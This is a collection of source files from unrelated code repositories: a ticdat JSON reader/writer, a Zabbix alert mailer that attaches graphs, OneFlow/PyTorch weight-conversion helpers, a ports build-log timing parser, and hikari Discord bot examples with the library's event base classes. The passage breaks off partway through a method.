#### File: ticdat/ticdat/jsontd.py
```python
import os
from collections import defaultdict
from ticdat.utils import freezable_factory, TicDatError, verify, stringish, dictish, containerish
from ticdat.utils import find_duplicates_from_dict_ticdat
import datetime
import itertools
try:
import json
except:
json = None
_can_unit_test = json
def _standard_verify(tdf):
verify(json, "json needs to be installed to use this subroutine")
verify(not tdf.generator_tables, "json not yet implemented for generator tables.")
verify(not tdf.generic_tables, "json not yet implemented for generic tables.\n" +
"This is due to lack of multi-index json support. See goo.gl/u6FGBg")
def make_json_dict(tdf, tic_dat, verbose=False, use_infinity_io_flag_if_provided=False):
assert tdf.good_tic_dat_object(tic_dat)
def write_cell(t, f, x):
if isinstance(x, datetime.datetime):
return str(x)
return x if not use_infinity_io_flag_if_provided else tdf._infinity_flag_write_cell(t, f, x)
jdict = defaultdict(list)
for t in tdf.all_tables:
all_fields = tdf.primary_key_fields.get(t,()) + tdf.data_fields.get(t,())
def make_row(row):
assert containerish(row) and len(row) == len(all_fields)
row = [write_cell(t, f, x) for f, x in zip(all_fields, row)]
return {f:v for f,v in zip(all_fields, row)} if verbose else row
appender = lambda row : jdict[t].append(make_row(row))
tbl = getattr(tic_dat, t)
if tdf.primary_key_fields.get(t):
for pk, data_row in tbl.items():
appender((list(pk) if containerish(pk) else [pk]) +
[data_row[df] for df in tdf.data_fields[t]])
else:
for data_row in tbl:
appender([data_row[df] for df in tdf.data_fields[t]])
return jdict
class JsonTicFactory(freezable_factory(object, "_isFrozen")) :
"""
Primary class for reading/writing json files with TicDat objects.
You need the json package to be installed to use it.
"""
def __init__(self, tic_dat_factory):
"""
Don't call this function explicitly. A JsonTicFactory will
automatically be associated with the json attribute of the parent
TicDatFactory.
:param tic_dat_factory:
:return:
"""
self.tic_dat_factory = tic_dat_factory
self._isFrozen = True
def _looks_pandas(self, jdict):
if not all(set(itertools.chain(*v)) == {'columns', 'data'} for v in self.tic_dat_factory.schema().values()):
return all(dictish(v) and set(v.keys()) == {'columns', 'data'} for v in jdict.values())
def create_tic_dat(self, json_file_path, freeze_it = False, from_pandas = False):
"""
Create a TicDat object from a json file
:param json_file_path: A json file path. It should encode a dictionary
with table names as keys. Could also be an actual JSON string
:param freeze_it: boolean. should the returned object be frozen?
:param from_pandas: boolean. If truthy, then use pandas json readers. See
PanDatFactory json readers for more details. This argument is historical, as a
json format that matches the PanDatFactory.json format will be detected automatically,
and thus client code is generally safe ignoring this argument completely.
:return: a TicDat object populated by the matching tables.
        caveats: Table name matches are case insensitive and also
underscore-space insensitive.
Tables that don't find a match are interpreted as an empty table.
Dictionary keys that don't match any table are ignored.
"""
_standard_verify(self.tic_dat_factory)
if from_pandas:
from ticdat import PanDatFactory
pdf = PanDatFactory.create_from_full_schema(self.tic_dat_factory.schema(include_ancillary_info=True))
_rtn = pdf.json.create_pan_dat(json_file_path)
return pdf.copy_to_tic_dat(_rtn, freeze_it=freeze_it)
jdict = self._create_jdict(json_file_path)
if self._looks_pandas(jdict):
return self.create_tic_dat(json_file_path, freeze_it=freeze_it, from_pandas=True)
tic_dat_dict = self._create_tic_dat_dict(jdict)
missing_tables = set(self.tic_dat_factory.all_tables).difference(tic_dat_dict)
if missing_tables:
print ("The following table names could not be found in the json file/string\n%s\n"%
"\n".join(missing_tables))
rtn = self.tic_dat_factory.TicDat(**tic_dat_dict)
rtn = self.tic_dat_factory._parameter_table_post_read_adjustment(rtn)
if freeze_it:
return self.tic_dat_factory.freeze_me(rtn)
return rtn
def find_duplicates(self, json_file_path, from_pandas = False):
"""
Find the row counts for duplicated rows.
:param json_file_path: A json file path. It should encode a dictionary
with table names as keys.
:param from_pandas: boolean. If truthy, then use pandas json readers. See
PanDatFactory json readers for more details.
:return: A dictionary whose keys are table names for the primary-ed key tables.
Each value of the return dictionary is itself a dictionary.
The inner dictionary is keyed by the primary key values encountered in the table,
and the value is the count of records in the json entry with this primary key.
Row counts smaller than 2 are pruned off, as they aren't duplicates
"""
_standard_verify(self.tic_dat_factory)
if from_pandas:
from ticdat import PanDatFactory
pdf = PanDatFactory.create_from_full_schema(self.tic_dat_factory.schema(include_ancillary_info=True))
_rtn = pdf.json.create_pan_dat(json_file_path)
jdict = {t: [tuple(_) for _ in getattr(_rtn, t).itertuples(index=False)] for t in pdf.all_tables}
else:
jdict = self._create_jdict(json_file_path)
if self._looks_pandas(jdict):
return self.find_duplicates(json_file_path, from_pandas=True)
rtn = find_duplicates_from_dict_ticdat(self.tic_dat_factory, jdict)
return rtn or {}
def _create_jdict(self, path_or_buf):
if stringish(path_or_buf) and os.path.exists(path_or_buf):
reasonble_string = path_or_buf
verify(os.path.isfile(path_or_buf), "json_file_path is not a valid file path.")
try :
with open(path_or_buf, "r") as fp:
jdict = json.load(fp)
except Exception as e:
raise TicDatError("Unable to interpret %s as json file : %s" %
(path_or_buf, e))
else:
verify(stringish(path_or_buf), "%s isn't a string" % path_or_buf)
reasonble_string = path_or_buf[:10]
try:
jdict = json.loads(path_or_buf)
except Exception as e:
raise TicDatError("Unable to interpret %s as json string : %s" %
(reasonble_string, e))
verify(dictish(jdict), "%s failed to load a dictionary" % reasonble_string)
verify(all(map(stringish, jdict)),
"The dictionary loaded from %s isn't indexed by strings" % reasonble_string)
verify(all(map(containerish, jdict.values())),
"The dictionary loaded from %s doesn't have containers as values" % reasonble_string)
return jdict
def _create_tic_dat_dict(self, jdict):
tdf = self.tic_dat_factory
rtn = {}
table_keys = defaultdict(list)
for t in tdf.all_tables:
for t2 in jdict:
if stringish(t2) and t.lower() == t2.replace(" ", "_").lower():
table_keys[t].append(t2)
if len(table_keys[t]) >= 1:
verify(len(table_keys[t]) < 2, "Found duplicate matching keys for table %s"%t)
rtn[t] = jdict[table_keys[t][0]]
orig_rtn, rtn = rtn, {}
for t, rows in orig_rtn.items():
all_fields = tdf.primary_key_fields.get(t, ()) + tdf.data_fields.get(t, ())
rtn[t] = []
for row in rows:
if dictish(row):
rtn[t].append({f: tdf._general_read_cell(t, f, x) for f, x in row.items()})
else:
rtn[t].append([tdf._general_read_cell(t, f, x) for f, x in zip(all_fields, row)])
return rtn
def write_file(self, tic_dat, json_file_path, allow_overwrite=False, verbose=False, to_pandas=False):
"""
write the ticDat data to a json file (or json string)
:param tic_dat: the data object to write (typically a TicDat)
:param json_file_path: The file path of the json file to create. If empty string, then return a JSON string.
:param allow_overwrite: boolean - are we allowed to overwrite an
existing file?
:param verbose: boolean. Verbose mode writes the data rows as dicts
keyed by field name. Otherwise, they are lists.
:param to_pandas: boolean. if truthy, then use the PanDatFactory method of writing to json.
:return:
"""
_standard_verify(self.tic_dat_factory)
verify(not (to_pandas and verbose), "verbose argument is inconsistent with to_pandas")
verify(not (json_file_path and os.path.exists(json_file_path) and not allow_overwrite),
"%s exists and allow_overwrite is not enabled"%json_file_path)
if to_pandas:
from ticdat import PanDatFactory
pdf = PanDatFactory.create_from_full_schema(self.tic_dat_factory.schema(include_ancillary_info=True))
return pdf.json.write_file(self.tic_dat_factory.copy_to_pandas(tic_dat, drop_pk_columns=False),
json_file_path)
msg = []
if not self.tic_dat_factory.good_tic_dat_object(tic_dat, lambda m : msg.append(m)) :
raise TicDatError("Not a valid TicDat object for this schema : " + " : ".join(msg))
jdict = make_json_dict(self.tic_dat_factory, tic_dat, verbose, use_infinity_io_flag_if_provided=True)
if not json_file_path:
return json.dumps(jdict, sort_keys=True, indent=2)
with open(json_file_path, "w") as fp:
json.dump(jdict, fp, sort_keys=True, indent=2)
``` |
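A quick round-trip sketch of the `JsonTicFactory` above as it is reached through a `TicDatFactory`'s `json` attribute; the one-table schema is invented for the example.

```python
from ticdat import TicDatFactory

tdf = TicDatFactory(colors=[["Name"], ["Hex"]])
dat = tdf.TicDat(colors={"red": {"Hex": "#ff0000"}})

json_str = tdf.json.write_file(dat, "")        # empty path -> returns a JSON string
round_tripped = tdf.json.create_tic_dat(json_str)
assert set(round_tripped.colors) == {"red"}
```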
{
"source": "8140171224/Class-Object-function",
"score": 4
} |
#### File: Class-Object-function/function/odd_even.py
```python
def count(lst):
even = 0
odd = 0
for i in lst:
if i%2==0:
even+=1
else:
odd+=1
return even,odd
lst = [25,35,51,65,5745,132,4,21,32,541]
even, odd = count(lst)
print(f'Even : {even} & odd : {odd}')
``` |
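An equivalent one-pass variant using `sum()` over a generator, shown only as an alternative sketch of the same counting logic.

```python
def count(lst):
    even = sum(1 for i in lst if i % 2 == 0)
    return even, len(lst) - even

print(count([25, 35, 51, 65, 5745, 132, 4, 21, 32, 541]))  # -> (3, 7)
```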
{
"source": "815325223/Scripts",
"score": 2
} |
#### File: Scripts/Zabbix/mail_with_graph.py
```python
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.application import MIMEApplication
from pyzabbix import ZabbixAPI
import os
import argparse
import logging
import datetime
import requests
import tempfile
import re
import urllib3
class Zabbix_Graph(object):
""" Zabbix_Graph """
def __init__(self, url=None, user=None, pwd=None, timeout=None):
urllib3.disable_warnings()
if timeout == None:
self.timeout = 1
else:
self.timeout = timeout
self.url = url
self.user = user
        self.pwd = pwd
self.cookies = {}
self.zapi = None
def _do_login(self):
""" do_login """
if self.url == None or self.user == None or self.pwd == None:
            print "url, user and pwd can not be None"
return None
if self.zapi is not None:
return self.zapi
try:
zapi = ZabbixAPI(self.url)
zapi.session.verify = False
zapi.login(self.user, self.pwd)
self.cookies["zbx_sessionid"] = str(zapi.auth)
self.zapi = zapi
return zapi
except Exception as e:
print "auth failed:\t%s " % (e)
return None
def _is_can_graph(self, itemid=None):
self.zapi = self._do_login()
if self.zapi is None:
print "zabbix login fail, self.zapi is None:"
return False
if itemid is not None:
"""
0 - numeric float;
1 - character;
2 - log;
3 - numeric unsigned;
4 - text.
"""
item_info = self.zapi.item.get(
filter={"itemid": itemid}, output=["value_type"])
if len(item_info) > 0:
if item_info[0]["value_type"] in [u'0', u'3']:
return True
else:
print "get itemid fail"
return False
def get_graph(self, itemid=None):
""" get_graph """
if itemid == None:
print "itemid can not None"
return "ERROR"
if self._is_can_graph(itemid=itemid) is False or self.zapi is None:
print "itemid can't graph"
return "ERROR"
if len(re.findall('5.0', self.zapi.api_version())) == 1:
graph_url = "%s/chart.php?from=now-1h&to=now&itemids[]=%s" % (
zbx_url, itemid)
else:
graph_url = "%s/chart.php?period=3600&itemids[]=%s" % (
zbx_url, itemid)
try:
rq = requests.get(graph_url, cookies=self.cookies,
timeout=self.timeout, stream=True, verify=False)
if rq.status_code == 200:
imgpath = tempfile.mktemp()
with open(imgpath, 'wb') as f:
for chunk in rq.iter_content(1024):
f.write(chunk)
return imgpath
rq.close()
except:
return "ERROR"
class Mail(object):
""" send mail"""
    def __init__(self, server=None, port=None, user=None, pwd=None):
self.server = server
self.port = port
self.user = user
        self.pwd = pwd
self.logpath = '/tmp/.zabbix_alert'
def _connect(self):
""" Connect to SMTP server """
if self.server == None or self.port == None or self.user == None or self.pwd == None:
print "Error smtp_server=None, smtp_port=None, smtp_user=None, smtp_u_pwd=None"
return False
try:
if self.port == 465:
smtp = smtplib.SMTP_SSL()
smtp.connect(self.server, self.port)
elif self.port == 587:
smtp = smtplib.SMTP()
smtp.connect(self.server, self.port)
smtp.ehlo()
smtp.starttls()
smtp.ehlo
else:
smtp = smtplib.SMTP()
smtp.connect(self.server, self.port)
smtp.login(self.user, self.pwd)
return smtp
except Exception as e:
print "Connect to smtp server error:\t%s" % (e)
return False
return True
def Send(self, receiver, subject, content, img=None):
""" Send mail to user """
smtp_connect = self._connect()
if smtp_connect == None or smtp_connect == False:
return
if img == None:
"""send with graph"""
msg = MIMEText(content, _subtype='plain', _charset='utf-8')
msg['Subject'] = unicode(subject, 'UTF-8')
msg['From'] = self.user
msg['to'] = receiver
try:
smtp_connect.sendmail(
self.user, receiver, msg.as_string())
except Exception as e:
print "send mail error:\t%s" % (e)
else:
"""send with graph"""
msg = MIMEMultipart('related')
msg['Subject'] = unicode(subject, 'UTF-8')
msg['From'] = self.user
msg['to'] = receiver
content = content.replace("\n", "<br/>")
content_html = """\
<p>%s<br/>
<img src="cid:monitor_graph">
</p>""" % (content)
msg_html = MIMEText(
content_html, _subtype='html', _charset='utf-8')
with open(img, 'rb') as f_img:
read_img = f_img.read()
msg_img = MIMEImage(read_img, 'png')
msg_img.add_header('Content-ID', '<monitor_graph>')
msg_img.add_header('Content-Disposition', 'inline', filename=img)
msg.attach(msg_html)
msg.attach(msg_img)
try:
smtp_connect.sendmail(self.user, receiver, msg.as_string())
except Exception as e:
print "send mail error:\t%s" % (e)
finally:
os.remove(img)
smtp_connect.close()
self.log(receiver, subject, content)
print 'send ok'
def log(self, receiver, subject, content):
""" log """
if not os.path.isdir(self.logpath):
os.makedirs(self.logpath)
# write log
try:
current_time = datetime.datetime.now()
current_day = current_time.strftime('%Y-%m-%d')
current_day_log = self.logpath + '/' + str(current_day) + '.log'
logging.basicConfig(filename=current_day_log, level=logging.DEBUG)
logging.info('*' * 130)
logging.debug(str(
current_time) + '\nsend mail to user:\t{0}\nsubject:\t\n{1}\ncontent:\t\n{2}'.format(receiver, subject, content))
if os.getuid() == 0:
os.system('chown zabbix.zabbix {0}'.format(current_day_log))
except:
pass
        # remove logs from 7 days ago
try:
days_ago_time = current_time - datetime.timedelta(days=7)
days_ago_day = days_ago_time.strftime('%Y-%m-%d')
days_ago_log = self.logpath + '/' + str(days_ago_day) + '.log'
if os.path.exists(days_ago_log):
os.remove(days_ago_log)
except:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='send mail to user for zabbix alerting')
parser.add_argument('receiver', action="store",
help='user of the mail to send')
parser.add_argument('subject', action="store",
help='subject of the mail')
parser.add_argument('content', action="store",
help='content of the mail')
parser.add_argument('withgraph', action="store", nargs='?',
default='None', help='The Zabbix Graph for mail')
args = parser.parse_args()
receiver = args.receiver
subject = args.subject
content = args.content
withgraph = args.withgraph
img = "ERROR"
itemid = "0"
#-----------------------------------------------------------------------------------#
# Mail Server (mail.qq.com), you should set it with you mail server information
smtp_server = 'smtp.qq.com'
smtp_port = 587
smtp_user = '<EMAIL>'
smtp_pwd = '{PASSWORD}'
# Zabbix API, you should set it
zbx_url = 'http://127.0.0.1/zabbix'
#zbx_url = 'http://127.0.0.1'
zbx_user = '{USER}'
zbx_pwd = '{PASSWORD}'
#-----------------------------------------------------------------------------------#
#get itemid from action
split_itemid = re.split("ItemID:\s\d", content)
pattern = re.compile(r'ItemID:.*')
str_itemid = pattern.findall(content)
if len(str_itemid) > 0:
itemid = str_itemid[0].replace(" ", "").replace("ItemID:", "")
#get graph from zabbix web
if withgraph != "None" and itemid != "0":
down_graph = Zabbix_Graph(
url=zbx_url, user=zbx_user, pwd=zbx_pwd, timeout=3)
if down_graph is not None:
img = down_graph.get_graph(itemid=itemid)
#send mail
mail_server = Mail(server=smtp_server, port=smtp_port,
user=smtp_user, pwd=smtp_pwd)
if img == "ERROR":
mail_server.Send(receiver, subject, content)
else:
mail_server.Send(receiver, subject, content, img=img)
#Action add this ItemID: {ITEM.ID}
``` |
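A hedged sketch of using the `Mail` class above outside of Zabbix (Python 2, matching the file); the server address, credentials and item id are placeholders, not real values.

```python
from mail_with_graph import Mail  # module name assumed from the file path

mailer = Mail(server='smtp.example.com', port=587,
              user='[email protected]', pwd='placeholder-password')
# when run as a Zabbix alert script, the __main__ block parses "ItemID: <id>"
# from the content to fetch and attach a graph; a plain send looks like this
mailer.Send('[email protected]', 'PROBLEM: high CPU load',
            'CPU load exceeded the trigger threshold\nItemID: 12345')
```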
{
"source": "8188zq/models",
"score": 3
} |
#### File: roberta/weights_transform/base_weight_utils.py
```python
import sys
import oneflow as flow
import torch
sys.path.append("../")
from models.dev_ops import LayerNorm
def colored_string(string: str, color: str or int, end="\n") -> str:
"""output string in different color in cmd [This code is copied from fitlog]
:param string: string to print
:param color: color
:return:
"""
if isinstance(color, str):
color = {
"black": 30,
"red": 31,
"green": 32,
"yellow": 33,
"blue": 34,
"purple": 35,
"cyan": 36,
"white": 37
}[color]
print("\033[%dm%s\033[0m" % (color, string), end=end)
DEPTH = 0
def indent_msg(msg, end=""):
for i in range(DEPTH):
if i == DEPTH - 1:
print(" |-", end="")
else:
print(" | ", end="")
colored_string(msg, color="yellow", end=end)
def enter():
global DEPTH
DEPTH += 1
def quit():
global DEPTH
DEPTH -= 1
def Parameter_trans(param_flow, param_torch):
assert isinstance(param_flow, flow.nn.Parameter)
assert isinstance(param_torch, torch.nn.Parameter)
data_flow = param_flow.data
data_torch = param_torch.data
assert data_flow.dim() == data_torch.dim(
), "dimension not equal: flow {} vs torch {}.".format(data_flow.shape, data_torch.shape)
for d_flow, d_torch in zip(data_flow.shape, data_torch.shape):
assert d_flow == d_torch, "shapes not equal: flow {} vs torch {}.".format(
data_flow.shape, data_torch.shape)
if param_torch.device == "cpu":
data = data_torch.detach().numpy()
else:
data = data_torch.cpu().detach().numpy()
param_flow = flow.nn.Parameter(flow.tensor(data))
return param_flow
def Embedding_trans(model_flow, model_torch):
print(" Embedding")
assert isinstance(model_flow, flow.nn.Embedding)
assert isinstance(model_torch, torch.nn.Embedding)
assert model_flow.num_embeddings == model_torch.num_embeddings, "num_embeddings not equal: flow {} vs torch {}.".format(
model_flow.num_embeddings, model_torch.num_embeddings)
assert model_flow.embedding_dim == model_torch.embedding_dim, "embedding_dim not equal: flow {} vs torch {}.".format(
model_flow.embedding_dim, model_torch.embedding_dim)
model_flow.padding_idx = model_torch.padding_idx
model_flow.max_norm = model_torch.max_norm
model_flow.norm_type = model_torch.norm_type
model_flow.scale_grad_by_freq = model_torch.scale_grad_by_freq
model_flow.sparse = model_torch.sparse
model_flow.weight = Parameter_trans(model_flow.weight, model_torch.weight)
return model_flow
def Linear_trans(model_flow, model_torch):
print(" Linear")
assert isinstance(model_flow, flow.nn.Linear)
assert isinstance(model_torch, torch.nn.Linear)
assert model_flow.in_features == model_torch.in_features, "in_features not equal: flow {} vs torch {}.".format(
model_flow.in_features, model_torch.in_features)
assert model_flow.out_features == model_torch.out_features, "out_features not equal: flow {} vs torch {}.".format(
model_flow.out_features, model_torch.out_features)
model_flow.weight = Parameter_trans(model_flow.weight, model_torch.weight)
model_flow.bias = Parameter_trans(model_flow.bias, model_torch.bias)
return model_flow
def LayerNorm_trans(model_flow, model_torch):
print(" LayerNorm")
assert isinstance(model_flow, LayerNorm)
# assert isinstance(model_flow, flow.nn.LayerNorm)
assert isinstance(model_torch, torch.nn.LayerNorm)
model_flow.a_2 = Parameter_trans(model_flow.a_2, model_torch.weight)
model_flow.b_2 = Parameter_trans(model_flow.b_2, model_torch.bias)
model_flow.eps = model_torch.eps
# model_flow.weight = Parameter_trans(model_flow.weight, model_torch.weight)
# model_flow.bias = Parameter_trans(model_flow.bias, model_torch.bias)
# model_flow.epsilon = model_torch.eps
# model_flow.elementwise_affine = model_torch.elementwise_affine
return model_flow
def Dropout_trans(model_flow, model_torch):
print(" Dropout")
assert isinstance(model_flow, flow.nn.Dropout)
assert isinstance(model_torch, torch.nn.Dropout)
    # Possibly not needed?
model_flow.p = model_torch.p
return model_flow
``` |
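A minimal usage sketch for the conversion helpers above, assuming it runs inside the repo next to this module (so its own imports resolve); the layer size is an arbitrary placeholder.

```python
import oneflow as flow
import torch

from base_weight_utils import Linear_trans  # assumed: executed alongside the module above

# Hypothetical pair of layers with matching shapes (768 is an arbitrary placeholder).
linear_torch = torch.nn.Linear(768, 768)
linear_flow = flow.nn.Linear(768, 768)

# Copies weight and bias from the torch layer into the oneflow layer.
linear_flow = Linear_trans(linear_flow, linear_torch)
```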
{
"source": "8191/opnsense-tools",
"score": 3
} |
#### File: opnsense-tools/scripts/parse_ports_log.py
```python
import collections
import argparse
from datetime import datetime
def log_reader(filename):
with open(filename ,'rb') as f_in:
for line in f_in:
line = line.decode()
if len(line) >= 22 and line[0] == '[' and line[15] == ']' and line[1:15].isdigit() \
and line[17:21] == '===>' and line.find(' for ') > -1:
if line.strip().endswith('for building'):
continue
log_rec = collections.namedtuple('record', ['stage', 'package', 'timestamp', 'ts_epoch'])
log_rec.stage = line[22:].split()[0]
log_rec.package = line.split(' for ')[-1].split()[0]
log_rec.timestamp = datetime(*map(lambda x: int(x), (
line[1:5], line[5:7], line[7:9], line[9:11], line[11:13], line[13:15]
)))
log_rec.ts_epoch = float(log_rec.timestamp.strftime("%s"))
yield log_rec
parser = argparse.ArgumentParser()
parser.add_argument('filename', help='ports build log filename')
parser.add_argument('--steps', help='show build steps', action="store_true", default=False)
args = parser.parse_args()
stats = dict()
prev_rec = collections.namedtuple('record', ['stage', 'package', 'timestamp', 'ts_epoch'])
for record in log_reader(args.filename):
if (prev_rec.stage != record.stage or prev_rec.package != record.package) and type(prev_rec.ts_epoch) == float:
if prev_rec.package not in stats:
stats[prev_rec.package] = dict()
stats[prev_rec.package]['__total__'] = 0.0
if prev_rec.stage not in stats[prev_rec.package]:
stats[prev_rec.package][prev_rec.stage] = {'count': 0, 'total_time': 0.0}
stats[prev_rec.package][prev_rec.stage]['total_time'] += (record.ts_epoch - prev_rec.ts_epoch)
stats[prev_rec.package][prev_rec.stage]['count'] += 1
stats[prev_rec.package]['__total__'] += (record.ts_epoch - prev_rec.ts_epoch)
prev_rec = record
total_time = 0.0
for item in sorted(stats.items(), key=lambda x: x[1]['__total__']):
package = item[0]
for stage in sorted(item[1]):
if type(stats[package][stage]) == dict and args.steps:
print ("%-40s %-5.0f seconds [execs : %d]" % (
"%s[%s]" % (package, stage),
stats[package][stage]['total_time'],
stats[package][stage]['count']
))
print ("%-40s %-5.0f seconds" % (package, stats[package]['__total__']))
total_time += stats[package]['__total__']
print ("%-40s %-5.0f seconds" % ("*", total_time))
``` |
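For illustration, a hypothetical pair of log lines in the layout `log_reader` expects (a 14-digit timestamp in brackets, the `===>` marker, and a trailing `for <package>` clause); the package name and times are invented.

```python
# Invented sample lines; the field offsets match the checks in log_reader above.
sample = (
    "[20230101120000] ===> Building for pkg-a-1.0\n"
    "[20230101120130] ===> Installing for pkg-a-1.0\n"
)

line = sample.splitlines()[0]
assert line[0] == '[' and line[15] == ']' and line[1:15].isdigit()
assert line[17:21] == '===>' and line.find(' for ') > -1
print(line[22:].split()[0], line.split(' for ')[-1].split()[0])  # Building pkg-a-1.0
```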
{
"source": "81CuongVn/hikaki",
"score": 3
} |
#### File: hikaki/examples/hello_world.py
```python
import os
import hikari
bot = hikari.GatewayBot(token=os.environ["BOT_TOKEN"])
@bot.listen()
async def on_message(event: hikari.MessageCreateEvent) -> None:
"""Listen for messages being created."""
if not event.is_human:
# Do not respond to bots or webhooks!
return
if event.content == "!ping":
await event.message.respond(f"Pong! {bot.heartbeat_latency * 1_000:.0f}ms")
bot.run()
```
#### File: hikaki/examples/simple_dashboard.py
```python
import logging
import os
import rillrate
from rillrate import prime as rr_prime
import hikari
PREFIX = ","
# Name used to group dashboards.
# You could have multiple packages for different applications, such as a package for the bot
# dashboards, and another package for a web server running alongside the bot.
PACKAGE = "Rillrate Example"
# Dashboards are a part inside of package, they can be used to group different types of
# dashboards that you may want to use, like a dashboard for system status, another dashboard
# for cache status, and another one to configure features or trigger actions on the bot.
DASHBOARD = "Control Panel"
# These are menus inside the dashboard, you can use them to group specific sets
# of data inside the same dashboard.
GROUP_CONFIG = "1 - Example"
# All the 3 configurable namespaces are sorted alphabetically.
# Class with all our dashboard logic
class RillRateDashboard:
"""Global data shared across the entire bot, used to store dashboard values."""
__slots__ = ("logger", "value", "selector", "slider")
def __init__(self) -> None:
self.logger = logging.getLogger("dashboard")
self.value = 0
# Install rillrate - Spins up the rillrate service in a separate thread, making it non-blocking :)
rillrate.install()
# Register the dashboard objects
dummy_values = [str(i) for i in range(0, 256 + 1, 32)]
self.selector = rr_prime.Selector(
f"{PACKAGE}.{DASHBOARD}.{GROUP_CONFIG}.Selector", label="Choose!", options=dummy_values
)
self.slider = rr_prime.Slider(
f"{PACKAGE}.{DASHBOARD}.{GROUP_CONFIG}.Slider", label="More fine grain control", min=0, max=256, step=2
)
# Add sync callbacks - This way we tell rillrate what functions to call when a sync event occurs
self.selector.sync_callback(self._selector_callback)
self.slider.sync_callback(self._slider_callback)
def _selector_callback(self, activity: rillrate.Activity, action: rillrate.Action) -> None:
self.logger.info("Selector activity: %s | action = %s", activity, action)
if action is not None:
value = int(action.value)
self.logger.info("Selected: %s", value)
# Update the slider too, so they show the same value.
self.slider.apply(value)
# Overwrite the current stored value on the global data with the new selected value.
self.value = value
def _slider_callback(self, activity: rillrate.Activity, action: rillrate.Action) -> None:
self.logger.info("Slider activity: %s | action = %s", activity, action)
if action is not None:
value = int(action.value)
self.logger.info("Slided to: %s", value)
# Update the selector too, so they show the same value.
# It is important to note that since not all values are present in the selector, it might be empty sometimes
self.selector.apply(str(value))
# Overwrite the current stored value on the global data with the new selected value.
self.value = value
bot = hikari.GatewayBot(token=os.environ["BOT_TOKEN"])
dashboard = RillRateDashboard()
def is_command(cmd_name: str, content: str) -> bool:
"""Check if the message sent is a valid command."""
return content == f"{PREFIX}{cmd_name}"
@bot.listen()
async def message(event: hikari.GuildMessageCreateEvent) -> None:
"""Listen for messages being created."""
if not event.is_human or not event.content:
return
# Command Framework 101 :D
if event.content.startswith(PREFIX):
if is_command("ping", event.content):
await event.message.respond("Pong!")
elif is_command("value", event.content):
await event.message.respond(f"Current value: {dashboard.value}")
bot.run()
```
#### File: hikari/events/base_events.py
```python
from __future__ import annotations
__all__: typing.List[str] = [
"Event",
"ExceptionEvent",
"is_no_recursive_throw_event",
"no_recursive_throw",
"get_required_intents_for",
"requires_intents",
]
import abc
import inspect
import typing
import attr
from hikari import intents
from hikari import traits
from hikari.api import shard as gateway_shard
from hikari.internal import attr_extensions
if typing.TYPE_CHECKING:
import types
T = typing.TypeVar("T")
REQUIRED_INTENTS_ATTR: typing.Final[str] = "___requiresintents___"
NO_RECURSIVE_THROW_ATTR: typing.Final[str] = "___norecursivethrow___"
class Event(abc.ABC):
"""Base event type that all Hikari events should subclass."""
__slots__: typing.Sequence[str] = ()
@property
@abc.abstractmethod
def app(self) -> traits.RESTAware:
"""App instance for this application.
Returns
-------
hikari.traits.RESTAware
The REST-aware app trait.
"""
def get_required_intents_for(event_type: typing.Type[Event]) -> typing.Collection[intents.Intents]:
"""Retrieve the intents that are required to listen to an event type.
Parameters
----------
event_type : typing.Type[Event]
The event type to get required intents for.
Returns
-------
typing.Collection[hikari.intents.Intents]
Collection of acceptable subset combinations of intent needed to
be able to receive the given event type.
"""
result = getattr(event_type, REQUIRED_INTENTS_ATTR, ())
assert isinstance(result, typing.Collection)
return result
def requires_intents(first: intents.Intents, *rest: intents.Intents) -> typing.Callable[[T], T]:
"""Decorate an event type to define what intents it requires.
Parameters
----------
first : hikari.intents.Intents
First combination of intents that are acceptable in order to receive
the decorated event type.
*rest : hikari.intents.Intents
Zero or more additional combinations of intents to require for this
event to be subscribed to.
"""
def decorator(cls: T) -> T:
required_intents = [first, *rest]
setattr(cls, REQUIRED_INTENTS_ATTR, required_intents)
doc = inspect.getdoc(cls) or ""
doc += "\n\nThis requires one of the following combinations of intents in order to be dispatched:\n\n"
for intent_group in required_intents:
preview = " + ".join(
f"`{type(i).__module__}.{type(i).__qualname__}.{i.name}`" for i in intent_group.split()
)
doc += f" - {preview}\n"
cls.__doc__ = doc
return cls
return decorator
def no_recursive_throw() -> typing.Callable[[typing.Type[T]], typing.Type[T]]:
"""Decorate an event type to indicate errors should not be handled.
This is useful for exception event types that you do not want to
have invoked recursively.
"""
def decorator(cls: typing.Type[T]) -> typing.Type[T]:
setattr(cls, NO_RECURSIVE_THROW_ATTR, True)
doc = inspect.getdoc(cls) or ""
doc += (
"\n"
"!!! warning\n"
" Any exceptions raised by handlers for this event will be dumped to the\n"
" application logger and silently discarded, preventing recursive loops\n"
" produced by faulty exception event handling. Thus, it is imperative\n"
" that you ensure any exceptions are explicitly caught within handlers\n"
" for this event if they may occur.\n"
)
cls.__doc__ = doc
return cls
return decorator
def is_no_recursive_throw_event(obj: typing.Union[T, typing.Type[T]]) -> bool:
"""Return True if this event is marked as `___norecursivethrow___`."""
result = getattr(obj, NO_RECURSIVE_THROW_ATTR, False)
assert isinstance(result, bool)
return result
FailedEventT = typing.TypeVar("FailedEventT", bound=Event)
FailedCallbackT = typing.Callable[[FailedEventT], typing.Coroutine[typing.Any, typing.Any, None]]
@no_recursive_throw()
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
class ExceptionEvent(Event, typing.Generic[FailedEventT]):
"""Event that is raised when another event handler raises an `Exception`.
!!! note
Only exceptions that derive from `builtins.Exception` will be caught.
Other exceptions outside this range will propagate past this callback.
This prevents event handlers interfering with critical exceptions
        such as `KeyboardInterrupt` which would have potentially undesired
side-effects on the application runtime.
"""
exception: Exception = attr.field()
"""Exception that was raised.
Returns
-------
builtins.Exception
Exception that was raised in the event handler.
"""
failed_event: FailedEventT = attr.field()
"""Event instance that caused the exception.
Returns
-------
hikari.events.base_events.Event
Event that was being processed when the exception occurred.
"""
failed_callback: FailedCallbackT[FailedEventT] = attr.field()
"""Event callback that threw an exception.
Returns
-------
callback
Event callback that failed execution.
"""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.failed_event.app
@property
def shard(self) -> typing.Optional[gateway_shard.GatewayShard]:
"""Shard that received the event, if there was one associated.
Returns
-------
typing.Optional[hikari.api.shard.GatewayShard]
Shard that raised this exception.
This may be `builtins.None` if no specific shard was the cause of this
exception (e.g. when starting up or shutting down).
"""
shard = getattr(self.failed_event, "shard", None)
if isinstance(shard, gateway_shard.GatewayShard):
return shard
return None
@property
def exc_info(self) -> typing.Tuple[typing.Type[Exception], Exception, typing.Optional[types.TracebackType]]:
